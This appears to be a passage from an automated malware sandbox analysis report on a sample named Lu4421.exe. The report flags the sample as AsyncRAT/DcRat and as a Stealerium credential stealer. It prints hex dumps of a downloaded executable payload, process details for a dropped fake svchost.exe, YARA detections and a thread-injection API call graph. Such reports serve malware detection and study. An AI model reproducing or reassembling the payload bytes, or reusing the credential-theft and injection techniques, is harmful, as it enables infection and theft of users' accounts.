                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:>g @ `@
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 0a 2a 6e 7e 85 01 00 04 39 10 00 00 00 7e 85 01 00 04 6f 00 01 00 0a 14 80 85 01 00 04 2a 56 d0 1a 00 00 02 28 62 00 00 0a 28 91 00 00 0a 80 8a 01 00 04 2a 7e 7e 0e 00 00 04 28 1a 00 00 0a 39 0f 00 00 00 28 49 00 00 06 39 05 00 00 00 28 70 00 00 06 2a 56 72 41 1c 00 70 7e 0f 00 00 04 28 86 00 00 0a 80 8d 01 00 04 2a 5e 02 28 1c 00 00 0a 03 6f 23 00 00 0a 28 78 00 00 06 28 09 01 00 0a 2a 5e 28 1c 00 00 0a 02 03 28 1d 00 00 0a 28 7a 00 00 06 6f 1e 00 00 0a 2a 56 28 bd 00 00 0a 72 21 1d 00 70 6f 23 00 00 0a 80 94 01 00 04 2a 32 7e 99 01 00 04 02 6f 23 00 00 0a 2a 32 7e 99 01 00 04 02 6f 1e 00 00 0a 2a 32 02 28 1f 01 00 0a 28 81 00 00 06 2a 8e 1a 8d 53 00 00 01 25 19 02 d2 9c 25 18 02 1e 63 d2 9c 25 17 02 1f 10 63 d2 9c 25 16 02 1f 18 63 d2 9c 2a 4e 18 8d 53
                                                                                Data Ascii: *n~9~o*V(b(*~~(9(I9(p*VrAp~(*^(o#(x(*^(((zo*V(r!po#*2~o#*2~o*2((*S%%c%c%c*NS
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 01 00 00 01 00 00 73 00 19 8c 00 06 01 00 00 01 00 00 93 00 23 b6 00 06 01 00 00 01 00 00 bd 00 19 d6 00 06 01 00 00 01 00 00 e1 00 14 f5 00 06 01 00 00 01 00 00 fc 00 19 15 01 06 01 00 00 01 1b 30 02 00 41 01 00 00 02 00 00 11 28 1c 00 00 0a 7e 07 00 00 04 28 1d 00 00 0a 6f 1e 00 00 0a 80 07 00 00 04 7e 07 00 00 04 73 76 00 00 06 80 0c 00 00 04 7e 0c 00 00 04 7e 01 00 00 04 6f 79 00 00 06 80 01 00 00 04 7e 0c 00 00 04 7e 02 00 00 04 6f 79 00 00 06 80 02 00 00 04 7e 0c 00 00 04 7e 03 00 00 04 6f 79 00 00 06 80 03 00 00 04 7e 0c 00 00 04 7e 04 00 00 04 6f 79 00 00 06 80 04 00 00 04 7e 0c 00 00 04 7e 08 00 00 04 6f 79 00 00 06 80 08 00 00 04 7e 0c 00 00 04 7e 0d 00 00 04 6f 79 00 00 06 80 0d 00 00 04 7e 0c 00 00 04 7e 13 00 00 04 6f 79 00 00 06 80 13 00 00
                                                                                Data Ascii: s#0A(~(o~sv~~oy~~oy~~oy~~oy~~oy~~oy~~oy
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 10 27 00 00 20 98 3a 00 00 6f 38 00 00 0a 73 2d 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 38 00 00 0a 73 40 00 00 0a 28 11 00 00 06 14 fe 06 22 00 00 06 73 3f 00 00 0a 14 17 17 73 40 00 00 0a 28 16 00 00 06 28 08 00 00 06 28 0a 00 00 06 28 0e 00 00 06 69 28 0c 00 00 06 69 14 fe 06 1f 00 00 06 73 41 00 00 0a 14 6f 42 00 00 0a 26 38 06 00 00 00 16 28 13 00 00 06 dd 0c 00 00 00 26 16 28 13 00 00 06 dd 00 00 00 00 2a 00 00 00 41 4c 00 00 00 00 00 00 ce 00 00 00 26 00 00 00 f4 00 00 00 06 00 00 00 01 00 00 01 02 00 00 00 21 01 00 00 82 00 00 00 a3 01 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 02 00 00 e4 02 00 00 0c 00 00 00 01 00 00 01 1b 30 02 00 6a 00 00 00 00 00 00 00 28 15 00 00 06 25 3a 06 00 00 00 26 38 05 00 00 00 28 45 00 00 0a 28 10 00
                                                                                Data Ascii: ' :o8s- ' :o8s@("s?s@((((i(isAoB&8(&(*AL&!0j(%:&8(E(
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 72 81 12 00 70 28 2b 00 00 0a 3a 25 00 00 00 07 72 8d 12 00 70 28 2b 00 00 0a 3a 60 00 00 00 07 72 9d 12 00 70 28 2b 00 00 0a 3a d9 00 00 00 38 6f 01 00 00 16 28 1a 00 00 06 73 bd 00 00 06 25 72 57 12 00 70 6f a8 00 00 06 72 81 12 00 70 6f aa 00 00 06 25 72 71 12 00 70 6f a8 00 00 06 28 17 00 00 06 6a 6f 9d 00 00 06 6f b2 00 00 06 28 20 00 00 06 16 28 18 00 00 06 38 24 01 00 00 00 06 72 b5 12 00 70 6f a8 00 00 06 6f b4 00 00 06 28 72 00 00 06 3a 54 00 00 00 7e 1f 00 00 04 06 6f 57 00 00 0a 73 bd 00 00 06 25 72 57 12 00 70 6f a8 00 00 06 72 bd 12 00 70 6f aa 00 00 06 25 72 d3 12 00 70 6f a8 00 00 06 06 72 b5 12 00 70 6f a8 00 00 06 6f b4 00 00 06 6f aa 00 00 06 6f b2 00 00 06 28 20 00 00 06 38 06 00 00 00 06 28 24 00 00 06 dd aa 00 00 00 6f 58 00 00 0a 28
                                                                                Data Ascii: rp(+:%rp(+:`rp(+:8o(s%rWporpo%rqpo(joo( (8$rpoo(r:T~oWs%rWporpo%rporpoooo( 8($oX(
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 00 00 0a 25 11 08 6f 75 00 00 0a 25 17 6f 7b 00 00 0a 25 16 6f 8b 00 00 0a 25 16 6f 8c 00 00 0a 25 17 6f 7a 00 00 0a 28 7c 00 00 0a 26 16 28 19 00 00 0a dd 1d 00 00 00 13 0a 72 b7 14 00 70 11 0a 6f 58 00 00 0a 28 86 00 00 0a 28 26 00 00 06 dd 00 00 00 00 2a 41 64 00 00 00 00 00 00 51 00 00 00 28 00 00 00 79 00 00 00 06 00 00 00 01 00 00 01 02 00 00 00 16 01 00 00 2c 00 00 00 42 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 b5 01 00 00 6c 00 00 00 21 02 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 02 00 00 6a 02 00 00 1d 00 00 00 41 00 00 01 1b 30 02 00 32 00 00 00 00 00 00 00 16 28 2b 00 00 06 7e 21 00 00 04 6f 8e 00 00 0a 14 fe 06 2e 00 00 06 73 8f 00 00 0a 73 90 00 00 0a 80 21 00 00 04 dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00
                                                                                Data Ascii: %ou%o{%o%o%oz(|&(rpoX((&*AdQ(y,Bl!jjA02(+~!o.ss!&*
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 10 00 00 11 1b 8d 01 00 00 01 25 16 28 b4 00 00 0a 8c 8a 00 00 01 a2 25 17 28 b5 00 00 0a a2 25 18 28 94 00 00 0a a2 25 19 28 b6 00 00 0a a2 25 1a 28 b7 00 00 0a 28 b8 00 00 0a 73 b9 00 00 0a 28 ba 00 00 0a 8c 8d 00 00 01 a2 28 bb 00 00 0a 0a 73 bc 00 00 0a 28 bd 00 00 0a 06 6f 23 00 00 0a 0b 07 6f 24 00 00 0a 0b 73 be 00 00 0a 0c 07 0d 16 13 04 38 1f 00 00 00 09 11 04 91 13 05 08 12 05 72 29 18 00 70 28 bf 00 00 0a 6f c0 00 00 0a 26 11 04 17 58 13 04 11 04 09 8e 69 32 da 08 6f 3d 00 00 0a 16 1f 14 6f c1 00 00 0a 6f c2 00 00 0a 13 06 dd 0d 00 00 00 26 72 2f 18 00 70 13 06 dd 00 00 00 00 11 06 2a 00 00 00 01 10 00 00 00 00 00 00 b5 b5 00 0d 01 00 00 01 13 30 07 00 d7 01 00 00 11 00 00 11 73 bd 00 00 06 25 72 57 12 00 70 6f a8 00 00 06 72 41 18 00 70 6f b5
                                                                                Data Ascii: %(%(%(%(%((s((s(o#o$s8r)p(o&Xi2o=oo&r/p*0s%rWporApo
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 17 6f e1 00 00 0a 72 55 1a 00 70 6f e2 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 00 7e 7d 00 00 0a 72 33 1a 00 70 17 6f e1 00 00 0a 72 45 1a 00 70 17 6f e1 00 00 0a 72 65 1a 00 70 6f e2 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 28 00 00 00 00 00 00 36 36 00 06 01 00 00 01 00 00 3d 00 2a 67 00 06 01 00 00 01 00 00 6e 00 2a 98 00 06 01 00 00 01 1b 30 03 00 68 00 00 00 16 00 00 11 28 6d 00 00 0a 6f e5 00 00 0a 6f e6 00 00 0a 0a 38 2a 00 00 00 06 6f 01 00 00 0a 74 1b 00 00 01 0b 07 6f e7 00 00 0a 02 17 28 e8 00 00 0a 3a 0c 00 00 00 07 6f e9 00 00 0a 0c dd 27 00 00 00 06 6f 02 00 00 0a 2d ce dd 14 00 00 00 06 75 40 00 00 01 0d 09 39 06 00 00 00 09 6f 27 00 00 0a dc 7e ad 00 00 0a 2a 08 2a 01 10 00 00 02 00 10 00 3c 4c 00 14 00 00 00 00 1b 30 04 00 f5
                                                                                Data Ascii: orUpo&~}r3porEporepo&*(66=*gn*0h(moo8*oto(:o'o-u@9o'~**<L0
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 11 0a 11 06 3f 62 ff ff ff dd 0c 00 00 00 26 72 c3 1a 00 70 73 f1 00 00 0a 7a 06 7e ad 00 00 0a 28 e3 00 00 0a 39 11 00 00 00 03 72 c3 1b 00 70 28 86 00 00 0a 73 f2 00 00 0a 7a 06 2a 00 00 00 41 1c 00 00 00 00 00 00 06 00 00 00 c0 01 00 00 c6 01 00 00 0c 00 00 00 01 00 00 01 1b 30 05 00 98 00 00 00 19 00 00 11 73 66 00 00 06 0a 06 03 7d 84 01 00 04 15 73 f5 00 00 0a 28 6d 00 00 0a 6f e5 00 00 0a 28 04 00 00 2b 06 fe 06 67 00 00 06 73 f7 00 00 0a 28 05 00 00 2b 28 06 00 00 2b 6f e9 00 00 0a 04 28 5e 00 00 06 0b 12 02 02 8e 69 28 f5 00 00 0a 16 0d 12 01 12 02 1f 40 12 03 28 57 00 00 06 26 02 16 07 02 8e 69 28 fa 00 00 0a dd 29 00 00 00 13 04 72 db 1b 00 70 11 04 6f 58 00 00 0a 28 fb 00 00 0a 72 db 1b 00 70 11 04 6f fc 00 00 0a 28 fb 00 00 0a dd 00 00 00 00
                                                                                Data Ascii: ?b&rpsz~(9rp(sz*A0sf}s(mo(+gs(+(+o(^i(@(W&i()rpoX(rpo(
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 0a 07 18 6f 10 01 00 0a 07 02 7b 92 01 00 04 6f 11 01 00 0a 07 6f 12 01 00 0a 06 07 6f 13 01 00 0a 17 73 14 01 00 0a 0c 06 07 6f 15 01 00 0a 16 07 6f 15 01 00 0a 8e 69 6f 51 00 00 0a 08 03 16 03 8e 69 6f 51 00 00 0a 08 6f 16 01 00 0a 02 7b 93 01 00 04 73 17 01 00 0a 0d 09 06 6f 18 01 00 0a 1f 20 06 6f 18 01 00 0a 8e 69 1f 20 59 6f 19 01 00 0a 13 04 06 16 6a 6f 53 00 00 0a 06 11 04 16 11 04 8e 69 6f 51 00 00 0a dd 27 00 00 00 09 39 06 00 00 00 09 6f 27 00 00 0a dc 08 39 06 00 00 00 08 6f 27 00 00 0a dc 07 39 06 00 00 00 07 6f 27 00 00 0a dc 06 6f 18 01 00 0a 13 05 dd 0d 00 00 00 06 39 06 00 00 00 06 6f 27 00 00 0a dc 11 05 2a 00 00 00 01 34 00 00 02 00 9c 00 35 d1 00 0d 00 00 00 00 02 00 6a 00 74 de 00 0d 00 00 00 00 02 00 26 00 c5 eb 00 0d 00 00 00 00 02
                                                                                Data Ascii: o{ooosooioQioQo{so oi YojoSioQ'9o'9o'9o'o9o'*45jt&

                                                                                Target ID:0
                                                                                Start time:06:07:17
                                                                                Start date:18/12/2024
                                                                                Path:C:\Users\user\Desktop\Lu4421.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\Lu4421.exe"
                                                                                Imagebase:0xb50000
                                                                                File size:5'865'472 bytes
                                                                                MD5 hash:E5358FCA58C0E1B1E29EB195FB0F4675
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:06:07:27
                                                                                Start date:18/12/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                                                Imagebase:0xdd0000
                                                                                File size:65'024 bytes
                                                                                MD5 hash:67CA41C73D556CC4CFC67FC5B425BBBD
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2946463897.0000000001288000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 84%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:06:07:27
                                                                                Start date:18/12/2024
                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944
                                                                                Imagebase:0x7ff783d80000
                                                                                File size:570'736 bytes
                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                  Execution Graph

                                                                                  Execution Coverage:14.4%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:23%
                                                                                  Total number of Nodes:87
                                                                                  Total number of Limit Nodes:4
                                                                                  execution_graph 7037 11b02bf 7038 11b0300 GetThreadContext 7037->7038 7048 11b03b6 7038->7048 7043 11b04ae 7056 11b04ec CloseHandle 7043->7056 7047 11b051a 7049 11b03d5 ResumeThread 7048->7049 7051 11b04ae 7049->7051 7052 11b04ec CloseHandle 7051->7052 7053 11b04e0 CloseHandle 7052->7053 7055 11b03a5 ResumeThread 7053->7055 7055->7043 7057 11b04e0 CloseHandle 7056->7057 7057->7047 7000 11b4f4e 7001 11b4f55 CloseHandle 7000->7001 7003 11b4fbd 7001->7003 7058 11ad2ef 7059 11ad2fb WaitForSingleObject 7058->7059 7060 11ad44a 7059->7060 6945 11abded 6948 11abe1b 6945->6948 6956 11abe45 WaitForSingleObject 6948->6956 6951 11abfd5 SleepEx 6953 11ac040 6951->6953 6953->6953 6962 11ac0a0 6953->6962 6955 11abe0e 6957 11abfd5 SleepEx 6956->6957 6959 11ac040 6957->6959 6959->6959 6960 11ac0a0 4 API calls 6959->6960 6961 11abe3d WaitForSingleObject 6960->6961 6961->6951 6963 11ac0f7 6962->6963 6964 11ac13d 6963->6964 6965 11ac3e7 SuspendThread 6963->6965 6964->6955 6967 11ac481 GetThreadContext 6965->6967 6969 11ac50c ResumeThread 6967->6969 6971 11ac67c CloseHandle 6969->6971 6973 11ac6ea 6971->6973 6973->6964 6935 124356c 6937 1243571 SleepEx FindWindowA 6935->6937 6938 12435f2 SleepEx FindWindowA 6937->6938 6939 12435ed 6937->6939 6938->6939 6940 124366b Sleep FindWindowA 6938->6940 6940->6939 6941 12436eb FindWindowA 6940->6941 6941->6939 6942 1243754 6941->6942 6942->6939 6943 1243761 FindWindowA 6942->6943 6943->6939 6944 12437b0 6943->6944 6944->6939 6990 11ac333 6992 11ac346 6990->6992 6991 11ac6ea 6991->6991 6992->6991 6993 11ac403 SuspendThread 6992->6993 6994 11ac481 GetThreadContext 6993->6994 6996 11ac50c ResumeThread 6994->6996 6998 11ac67c CloseHandle 6996->6998 6998->6991 7007 11af1a7 7009 11af1ac 7007->7009 7012 11af200 7009->7012 7011 11af1f6 7013 11af218 WaitForSingleObject 7012->7013 7015 11af243 7013->7015 7015->7011 7004 11aefb4 ResumeThread 7005 11aefd7 CloseHandle 
7004->7005 7006 11af03b 7005->7006 7029 11aae84 7030 11aae8a SuspendThread 7029->7030 7032 11aafbc GetThreadContext 7030->7032 7034 11ab0ae ResumeThread CloseHandle 7032->7034 7036 11ab26f 7034->7036 6974 11a7365 6976 11a736a 6974->6976 6977 11a7388 6976->6977 6979 11a73b7 6976->6979 6977->6979 6984 11a740c 6977->6984 6980 11a7493 timeGetTime 6979->6980 6981 11a74bb SleepEx 6979->6981 6980->6981 6983 11a77f6 6981->6983 6985 11a7412 6984->6985 6986 11a7493 timeGetTime 6985->6986 6987 11a74bb SleepEx 6985->6987 6986->6987 6989 11a77f6 6987->6989 7016 11af5a5 7017 11af5b1 7016->7017 7018 11af64c OpenThread 7017->7018 7019 11af5d0 OpenThread 7017->7019 7022 11af6d0 7018->7022 7019->7022 7023 11af86f SuspendThread 7022->7023 7028 11afae5 7022->7028 7024 11af887 GetThreadContext 7023->7024 7026 11af94a ResumeThread CloseHandle 7024->7026 7026->7028
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6d564f92f17d68001168d13561cea39b316657d49fd0c6f5c74dd7f75425f985
                                                                                  • Instruction ID: a0580586c6a60056cf59f02c76e268092fd5c93a6298fe4a0cf8f141582da8da
                                                                                  • Opcode Fuzzy Hash: 6d564f92f17d68001168d13561cea39b316657d49fd0c6f5c74dd7f75425f985
                                                                                  • Instruction Fuzzy Hash: CF526831B0E78E4FD765DB7888656E97FE0EF45310F1902BAD499CB1A3CD28A906C781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a830a8a5429d2038d67d0396ad63ad22db1d7bc5532f333cb19d56a1309ea122
                                                                                  • Instruction ID: 97eed43d4f4d4417be36d96ca52aaecc9137a8f920a3bcd0b22f982fbce665a0
                                                                                  • Opcode Fuzzy Hash: a830a8a5429d2038d67d0396ad63ad22db1d7bc5532f333cb19d56a1309ea122
                                                                                  • Instruction Fuzzy Hash: 81F1A730609B8D8FEBA8DF28C855BE97BD1FF54300F44426EE85DC72A5CB3499418782
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0d08f080f5ff016937c9c93a99a9a13085f76eeebf7f98692fdf3abbc40951b8
                                                                                  • Instruction ID: cd414ab0b4d7744183236dec054b795cb95e59b15a06fc105b6a0e610705d153
                                                                                  • Opcode Fuzzy Hash: 0d08f080f5ff016937c9c93a99a9a13085f76eeebf7f98692fdf3abbc40951b8
                                                                                  • Instruction Fuzzy Hash: AEE1A330A09A8D8FEBA8DF28C8657E97BD1EF54310F14426ED84DC72A5CF7499458BC1

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindSleepWindow
                                                                                  • String ID: EXPL$LASS$OW_C$WIND
                                                                                  • API String ID: 3078808852-207433289

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (7+t$07+t$7+t[$@7+t$P7+t$`7+t$6+t$7+t
                                                                                  • API String ID: 0-1342028135

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ([+t$0[+t$@\+t$@\+t$Z+t
                                                                                  • API String ID: 0-3153613545

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (7+t$07+t$4M_H$@7+t$6+t
                                                                                  • API String ID: 0-1803259142

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6+t$x6+t$x6+t
                                                                                  • API String ID: 0-1823284

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6+t$x6+t$x6+t
                                                                                  • API String ID: 0-1823284

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H$x6+t$x\+t
                                                                                  • API String ID: 0-3390991685

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
